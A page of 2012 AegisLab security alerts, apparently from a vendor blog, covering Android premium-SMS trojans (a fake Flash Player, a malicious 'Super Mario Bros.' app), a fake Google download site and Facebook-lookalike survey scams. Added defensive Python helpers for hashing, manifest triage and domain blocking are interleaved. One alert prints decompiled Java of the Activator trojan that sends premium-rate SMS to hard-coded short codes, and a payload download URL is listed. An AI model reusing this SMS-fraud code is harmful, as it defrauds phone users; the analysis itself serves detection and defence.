[ Security Alert ] 27 July, 2012 10:18

    AegisLab discovered a fake Adobe Flash Player app in a 3rd-party market in Russia. It is actually a variant of FakeInst (aka OpFake, SMSSend or TrojanSMS), which tricks the victim into downloading and installing it and then sends SMS messages to premium-rate numbers. The VirusTotal detection rate is shown below:

SHA256: 95781ff40529e6647f02e96e96c2f5d86a31cf9d2f02592d6b7666068925a225
SHA1: a04718f91e86ee6619f910c76509c0e16724c356
MD5: 0d8d9ad5a98ce9d77462779036cf0295
File size: 317.0 KB ( 324634 bytes )
File name: adobe_flash_player_v10.3.185.25_installer.apk
File type: Android
Tags: android
Detection ratio: 2 / 41
Analysis date: 2012-07-26 06:47:48 UTC
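To make the published indicators directly usable, here is an added example (not code from the AegisLab post) that hashes a file with the same three algorithms VirusTotal reports, compares the results and the byte length against the indicators above, and can sweep a directory of APKs. The sample bytes are a constructed placeholder, not the real APK, so they are expected not to match.

```python
import hashlib
from pathlib import Path

# Indicators copied from the VirusTotal summary above.
FAKE_FLASH_IOC = {
    "sha256": "95781ff40529e6647f02e96e96c2f5d86a31cf9d2f02592d6b7666068925a225",
    "sha1": "a04718f91e86ee6619f910c76509c0e16724c356",
    "md5": "0d8d9ad5a98ce9d77462779036cf0295",
    "size": 324634,
}

# Constructed stand-in for an APK under test (ZIP magic header plus filler).
# It is NOT the real sample, so it must not match the indicators above.
SAMPLE_BYTES = b"PK\x03\x04" + b"constructed-placeholder-apk" * 8


def digest_stream(chunks):
    """Hash an iterable of byte chunks with all three algorithms in one pass."""
    hashers = {"sha256": hashlib.sha256(), "sha1": hashlib.sha1(), "md5": hashlib.md5()}
    size = 0
    for chunk in chunks:
        size += len(chunk)
        for h in hashers.values():
            h.update(chunk)
    out = {name: h.hexdigest() for name, h in hashers.items()}
    out["size"] = size
    return out


def file_digests(data):
    """Digests and length of an in-memory byte string."""
    return digest_stream([data])


def match_digests(digests, ioc=FAKE_FLASH_IOC):
    """Names of the indicators that match (e.g. ['sha256', 'size']).
    Hex digests are compared case-insensitively because feeds differ in case."""
    hits = []
    for name, expected in ioc.items():
        if name not in digests:
            continue
        actual = digests[name]
        if isinstance(expected, str):
            if actual.lower() == expected.lower():
                hits.append(name)
        elif actual == expected:
            hits.append(name)
    return hits


def match_ioc(data, ioc=FAKE_FLASH_IOC):
    """Convenience wrapper: match a byte string against the indicator set."""
    return match_digests(file_digests(data), ioc)


def scan_directory(root, ioc=FAKE_FLASH_IOC, suffix=".apk"):
    """Hash every file with the given suffix under root (1 MiB chunks, so large
    APKs are not loaded into memory) and return {path: matched indicators}
    for files that match at least one indicator."""
    hits = {}
    for path in Path(root).rglob("*" + suffix):
        with path.open("rb") as fh:
            digests = digest_stream(iter(lambda: fh.read(1 << 20), b""))
        matched = match_digests(digests, ioc)
        if matched:
            hits[str(path)] = matched
    return hits


if __name__ == "__main__":
    print("placeholder matches:", match_ioc(SAMPLE_BYTES))
```

A single matching hash is enough to confirm the sample; a matching size alone is only a weak hint, which is why the function reports which indicators matched rather than a yes/no answer.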
 
After analyzing this malicious app and following the convoluted hyperlinks inside it in depth, we found that the following Android markets (or websites) are all malicious; they host many malicious APKs (some are normal):
  • androidmir.com and android-mir.com (Figure 1)
  • myadroidmaklet.net (Figure 2)
  • filedats.net (Figure 3)
  • file77mibi.net
  • androidmarkt.ru

Figure 1: androidmir.com

 

Figure 2: myadroidmaklet.net

 

Figure 3: filedats.net

 

How did we find the above malicious websites? One day, while our WebGuard Team was patrolling the Internet, a researcher found a suspicious link to an Android APK called "Cool Reader". The link is neither simple nor direct: it redirects you to another page and then jumps to another site in order to evade detection and tracking. Once you have installed the app, the fake app issues an urgent update notification that tricks you into downloading another app. The following figures show the whole trick:

Figure 4: Cool Reader

 

Figure 5: fake installation process

 

Figure 6: fake disclaimer (can you see the notification in the upper-left corner?)

 

Figure 7: tries to download another app

 

Figure 8: fake login page (just pressing Enter is OK)

 

Figure 9: lures you to the link http://androidmir.com/download/cr3-0-45-07.apk (the link does not exist)

 

Figure 10: the urgent update notification for Adobe Flash Player

 

Figure 11: connect to myadroidmaklet.net

 

While you are installing the fake Adobe Flash Player, you will see that it requires the read/send SMS, read contact data and read GPS location permissions (Figures 12, 13). The genuine Adobe Flash Player does not need such permissions.

Figure 12,13: fake Adobe Flash Player

 

Once the installation has completed, you will find a shortcut on the home screen. After clicking it, a "Browser" app is downloaded and installed (Figures 14, 15). The "Browser" app requires the same permissions as the fake Adobe Flash Player (Figures 16, 17).
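The permission mismatch described above (a "Flash Player" or "Browser" that wants to send SMS, read contacts and read GPS) is something an analyst can check mechanically before installing anything. The following is an added example, not code from the post: it parses a decoded AndroidManifest.xml, lists the sensitive permissions and flags the SEND_SMS + READ_CONTACTS combination that matches this trojan family's profile. Both manifests are constructed for the example; a real APK carries the manifest as binary XML, so it would first have to be decoded (for instance with apktool).

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed manifest modelled on the permissions the alert describes
# (read/send SMS, contacts, GPS). It is not extracted from the real APK.
SUSPECT_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.fakeflash">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <application android:label="Adobe Flash Player"/>
</manifest>
"""

# Constructed manifest of what a plugin/viewer app would plausibly request.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.viewer">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Viewer"/>
</manifest>
"""

# Permissions a media plugin or browser has no reason to request, with the
# capability each one grants.
SENSITIVE = {
    "android.permission.SEND_SMS": "can send premium-rate SMS",
    "android.permission.READ_SMS": "can read SMS (e.g. operator confirmations)",
    "android.permission.RECEIVE_SMS": "can intercept incoming SMS",
    "android.permission.READ_CONTACTS": "can harvest the address book",
    "android.permission.ACCESS_FINE_LOCATION": "can read GPS location",
}

# The combination that characterises the premium-SMS trojans in these alerts.
SMS_TROJAN_PROFILE = {"android.permission.SEND_SMS", "android.permission.READ_CONTACTS"}


def declared_permissions(manifest_xml):
    """Set of permission names declared by <uses-permission> elements."""
    root = ET.fromstring(manifest_xml)
    return {el.get("{%s}name" % ANDROID_NS) for el in root.iter("uses-permission")}


def triage_manifest(manifest_xml):
    """Summarise a manifest: package name, sensitive permissions and whether the
    declared set contains the SMS-trojan combination."""
    root = ET.fromstring(manifest_xml)
    perms = declared_permissions(manifest_xml)
    return {
        "package": root.get("package"),
        "sensitive": {p: SENSITIVE[p] for p in sorted(perms & set(SENSITIVE))},
        "sms_trojan_profile": SMS_TROJAN_PROFILE <= perms,
    }


if __name__ == "__main__":
    for name, xml in (("suspect", SUSPECT_MANIFEST), ("benign", BENIGN_MANIFEST)):
        print(name, triage_manifest(xml))
```

The profile check is deliberately a subset test, so an app that declares even more dangerous permissions than the two listed is still flagged; the per-permission table is there so the analyst can see which capability each request grants rather than a bare yes/no.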

  

Figure 14,15: update browser? (just a trick)

 

Figure 16,17: fake Browser

 

Yes, this kind of attack is old-fashioned and nothing special, but Android users are still being tricked by it. AegisLab reminds you to download apps only from trusted Android markets, never click suspicious links, and install AegisLab Antivirus :-)


By AegisLab 

 

[ Security Alert ] 24 July, 2012 18:15

    AegisLab discovered a Russian website called "google-file.com" which has a Google-style look (Figure 1). It is not an official Google service; it is a premium-rate SMS scam website. If you want to download some files (Figure 2), you first have to enter your phone number (Figure 3), and then the page tells you to send texts to a specific number in order to verify your identity (Figure 4). Finally, your money flies away (Figure 5).

 

Figure 1: Google-File.com

 

Figure 2: File to download

 

Figure 3: Input your phone number

 

Figure 4: Send premium-rate SMS to specific number

 

Figure 5: so many complaints to google-file.com

 

We also found that "google-fiile.mk3k.ru", "google-fille.org" and "google-fiile.org" redirect to Google-File.com. AegisLab WebGuard has blocked all 4 websites!
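Both this alert and the 27 July alert above name domains that are only reached at the end of a redirect chain. The following is an added example, not AegisLab WebGuard's code: it keeps the domains listed in the two alerts as a blocklist, matches a host or any of its subdomains against it, and walks a redirect chain hop by hop so that a lookalike redirector is caught even when only the final host is listed. The redirect chain is constructed for the example (the .invalid hosts are placeholders); only the final download path is taken from the alert.

```python
from urllib.parse import urlsplit

# Domains named as malicious in the two alerts above (27 July and 24 July 2012).
BLOCKED_DOMAINS = {
    "androidmir.com", "android-mir.com", "myadroidmaklet.net", "filedats.net",
    "file77mibi.net", "androidmarkt.ru",
    "google-file.com", "google-fiile.mk3k.ru", "google-fille.org", "google-fiile.org",
}

# Constructed redirect chain in the style of the "Cool Reader" lure: a harmless
# first hop, a click-tracker hop, then a download host under a blocked domain.
SAMPLE_CHAIN = [
    "http://forum.example.invalid/cool-reader",
    "http://click.example.invalid/go?id=1",
    "http://Download.AndroidMir.com/download/cr3-0-45-07.apk",
]


def normalize_host(url):
    """Lower-case hostname of a URL; also accepts scheme-less 'host/path' strings."""
    if "//" not in url:
        url = "//" + url
    host = urlsplit(url).hostname or ""   # .hostname is already lower-cased
    return host.rstrip(".")


def is_blocked(host, blocklist=BLOCKED_DOMAINS):
    """True if host equals a blocked domain or is a subdomain of one
    (www.google-file.com matches; notgoogle-file.com does not)."""
    labels = host.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in blocklist for i in range(len(labels)))


def first_blocked_hop(chain, blocklist=BLOCKED_DOMAINS):
    """Walk the URLs of a redirect chain (initial request plus each Location hop)
    and return (index, url) of the first blocked hop, or None if all are clean."""
    for i, url in enumerate(chain):
        if is_blocked(normalize_host(url), blocklist):
            return (i, url)
    return None


if __name__ == "__main__":
    print(first_blocked_hop(SAMPLE_CHAIN))
```

Checking every hop rather than only the first URL matters here because, as the 27 July alert describes, the lure page and the tracker in between are unremarkable and only the final host is on the list.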

 

By AegisLab

  

[ Security Alert ] 20 July, 2012 14:33

    Last week, AegisLab published「Security Alert 2012-07-12: Malicious "Super Mario Bros." App in Google Play」, in which we mentioned that the 2nd-stage infection tries to download an APK called "Activator.apk". The code snippet is listed below (the relevant parts are marked in red in the original post):

-----------------------------------------------------------------------
package com.activator;

import android.app.Activity;
import android.app.AlertDialog;
import android.app.AlertDialog.Builder;
import android.content.DialogInterface;
import android.content.DialogInterface.OnClickListener;
import android.os.Bundle;
import android.telephony.SmsManager;
import android.telephony.TelephonyManager;
import java.util.Random;
import java.util.regex.Pattern;

public class ActivatorActivity extends Activity
{
    TelephonyManager TM;
    AlertDialog.Builder builder;
    String operator;

    // Sends one SMS; the caller chooses the (premium-rate) destination number.
    private void sendSMS(String number, String message)
    {
        SmsManager.getDefault().sendTextMessage(number, null, message, null, null);
    }

    protected void onCreate(Bundle savedInstanceState)
    {
        super.onCreate(savedInstanceState);
        setContentView(2130903040); // layout resource id left as a raw constant by the decompiler
        this.TM = (TelephonyManager) getSystemService("phone");
        this.operator = this.TM.getSimOperatorName();

        // Branch on the first three characters of the SIM operator name.
        // The decompiler emitted this as a while(true)/return/continue loop;
        // it is shown here as the equivalent if/else chain.
        if (Pattern.matches("[bBeEeE]*", this.operator.substring(0, 3)))
        {
            int k = 1 + new Random().nextInt(10000);
            startProgress("1518", "DEF1773");
            startProgress("3170", "4037" + k);
            setResult(1);
            finish();
        }
        else if (Pattern.matches("[mMtTsS]*", this.operator.substring(0, 3)))
        {
            int j = 1 + new Random().nextInt(10000);
            startProgress("770656", "DEF1773");
            startProgress("3170", "4037" + j);
            setResult(1);
            finish();
        }
        else if (this.operator.equalsIgnoreCase(""))
        {
            // No SIM operator: show a fake "wallpaper database" error instead.
            this.builder = new AlertDialog.Builder(this);
            this.builder.setCancelable(false);
            this.builder.setMessage("Ошибка при загрузке базы обоев. Попробуйте позже.");
            this.builder.setNeutralButton("OK", new DialogInterface.OnClickListener()
            {
                public void onClick(DialogInterface dialog, int which)
                {
                    ActivatorActivity.this.setResult(0);
                    ActivatorActivity.this.finish();
                }
            });
            this.builder.create().show();
        }
        else
        {
            // Any other non-empty operator name.
            int i = 1 + new Random().nextInt(10000);
            startProgress("3170", "4037" + i);
            setResult(1);
            finish();
        }
    }

    // Sends the SMS from a background thread (the decompiler showed the
    // captured arguments as val$number / val$message).
    public void startProgress(final String number, final String message)
    {
        new Thread(new Runnable()
        {
            public void run()
            {
                ActivatorActivity.this.sendSMS(number, message);
            }
        }).start();
    }
}

-----------------------------------------------------------------------

Basically, it sends different messages to different numbers depending on the SIM operator name:

operator = getSimOperatorName()

Case 1: Pattern.matches("[bBeEeE]*", operator.substring(0, 3))
    number=1518,   message="DEF1773"
    number=3170,   message="4037" + random number in 1~10000

Case 2: Pattern.matches("[mMtTsS]*", operator.substring(0, 3))
    number=770656, message="DEF1773"
    number=3170,   message="4037" + random number in 1~10000

Case 3 (neither case 1 nor case 2, and the operator name is not empty):
    number=3170,   message="4037" + random number in 1~10000

If the operator name is empty, an alert dialog pops up: "Ошибка при загрузке базы обоев. Попробуйте позже." (translated by Google as "Failed to load base wallpaper. Please try again later").

Because "Super Mario Bros." masquerades as a wallpaper app, this message is just a ruse.
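To turn the decompiled snippet into reusable indicators, here is an added example (not code from the AegisLab post). It pulls the hard-coded destination numbers and message prefixes out of the decompiled source with a regular expression tuned to this sample's startProgress wrapper, marks which messages get a runtime suffix, flags short codes, and mirrors the onCreate branching so an analyst can ask which numbers a given SIM operator name would trigger. The source string is a constructed copy of the calls shown above; the operator names "Beeline" and "MTS" are sample inputs chosen because their first three letters satisfy the two character classes, which the post itself does not spell out.

```python
import re

# Constructed copy of the startProgress(...) calls and the SmsManager call from
# the decompiled Activator snippet, so the helpers below can run offline.
SAMPLE_SOURCE = r'''
startProgress("1518", "DEF1773");
startProgress("3170", "4037" + k);
startProgress("770656", "DEF1773");
startProgress("3170", "4037" + j);
startProgress("3170", "4037" + i);
SmsManager.getDefault().sendTextMessage(paramString1, null, paramString2, null, null);
'''

# Matches startProgress("<digits>", "<literal>" [+ <variable>]). The wrapper
# name is specific to this sample; other samples call SmsManager differently.
CALL_RE = re.compile(
    r'startProgress\(\s*"(?P<number>\d+)"\s*,\s*"(?P<message>[^"]*)"'
    r'(?P<dynamic>\s*\+\s*\w+)?\s*\)'
)
SEND_RE = re.compile(r'\bsendTextMessage\s*\(')


def extract_sms_targets(source):
    """Sorted (number, literal_prefix, has_runtime_suffix) tuples found in source."""
    found = set()
    for m in CALL_RE.finditer(source):
        found.add((m.group("number"), m.group("message"), m.group("dynamic") is not None))
    return sorted(found)


def is_short_code(number):
    """Premium-rate short codes are typically 3 to 6 digits long."""
    return number.isdigit() and 3 <= len(number) <= 6


def dispatch(operator_name):
    """Mirror the onCreate branching: the (number, message prefix) pairs sent for
    a given SIM operator name. Returns [] for the empty-name dialog path."""
    if operator_name == "":
        return []
    prefix = operator_name[:3]
    # Java's Pattern.matches() requires the whole 3-character prefix to match,
    # so re.fullmatch is the equivalent here.
    if re.fullmatch(r"[bBeEeE]*", prefix):
        return [("1518", "DEF1773"), ("3170", "4037")]
    if re.fullmatch(r"[mMtTsS]*", prefix):
        return [("770656", "DEF1773"), ("3170", "4037")]
    return [("3170", "4037")]


def triage_source(source):
    """Summary for a decompiled source file: SMS API use, targets and short codes."""
    targets = extract_sms_targets(source)
    return {
        "uses_sms_api": SEND_RE.search(source) is not None,
        "targets": targets,
        "short_codes": sorted({n for n, _, _ in targets if is_short_code(n)}),
    }


if __name__ == "__main__":
    print(triage_source(SAMPLE_SOURCE))
    for name in ("Beeline", "MTS", "Orange", ""):
        print(repr(name), "->", dispatch(name))
```

The has_runtime_suffix flag matters for detection: "DEF1773" can be matched as a full literal, while the "4037" messages only share a prefix because the random suffix is appended at run time.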


By AegisLab

 

[ Security Alert ] 12 July, 2012 17:57

    According to the Symantec and F-Secure blogs, a malicious "Super Mario Bros." app appeared in Google Play for several days. It looks like an action game, but after the installation has completed you will see the icon display "Mario HD Wallpaper", as in Figure 2. Google Play has removed this app and some related apps from the same developer, but you can still find the apps in 3rd-party markets, as in Figure 1. This app uses a 2-stage (or multi-stage) infection technique in order to evade the Google Play review. Simply speaking, the first-stage app is usually harmless, but the second stage downloads malicious content or another malicious APK to install.

In this app (Super Mario Bros.), we found 3 links to Dropbox that are malicious; they all point to http://dl.dropbox.com/u/87265868/Activator.apk !

 

Obviously, the second stage is to download "Activator.apk" and install it. After the installation has completed, "Activator" is launched, sends premium-rate SMS (targeting the Eastern European area) and finally uninstalls itself.

Figure 1: We discovered it on 3rd-party market.

 

Figure 2: "Mario HD Wallpaper"

 

Figure 3: Russian disclaimer

 

Figure 4: Russian disclaimer

  

Figure 5: AegisLab Antivirus detected

VirusTotal detection rate:

According to the developer information, AegisLab discovered 5 related apps from the same developer, and AegisLab Antivirus can detect them all.

By AegisLab 

[ Security Alert ] 12 July, 2012 13:55

    Remember the security alert we published before, 「Security Alert 2012-05-29: Facebook URL Hijacking」? AegisLab discovered that the website style of facenook.com and facevook.com now looks even more similar to the official FB website, as in Figure 1.

Figure 1: Looks so similar to the Facebook style


Once you get into the page, you will hear a recorded voice as follows:
"You have been selected to take part in our anonymous survey! 
Complete this 30 second questionnaire, and to say "thank you", we'll offer you an exclusive gift."

Click the "Start" button and then fill in the answers:

Figure 2: Answer the questions

 

After answering all 5 questions, a Best Buy and Walmart gift card prize page pops up, as in Figure 3. (Don't even think about it; you'll never win the prize!)

Figure 3: Choose the gift card

 

After choosing the gift card you want, you have to input your cell phone number and e-mail address, as in Figure 4. (OMG! Don't do that!)

Figure 4: Fill in cell phone number and e-mail address

Congratulations! You have finished the questionnaire, but all in vain, except for leaking your sensitive information (and you will get more spam :-) ).

 

By AegisLab

[ Security Alert ] 06 July, 2012 16:57

    Yesterday Kaspersky Lab found a trojan app on both Google Play and the Apple App Store, called "Find and Call" (Figure 1). After installation, if you have a SIM card in your phone, it tells you to input your phone number to register; if there is no SIM card but Wi-Fi is available, it tells you to input your e-mail address to register (Figure 2). This information is not actually verified by the server; the app just collects contact info from your phone book and sends it back to the C&C server. Then spam SMS is sent from the server, masquerading as a trusted source. Figure 3 is a screenshot of the app running.

AegisLab Antivirus Scanner can detect this malicious app (Figure 4). As for iOS users, you have to remove this app ASAP! (Perhaps your sensitive info has leaked already...)

Figure 1: App installed completely 

 

 

Figure 2: Input e-mail address to register

 

Figure 3: "Find and Call" is running

 

Figure 4: AegisLab Antivirus Scanner detected

 

By AegisLab

 
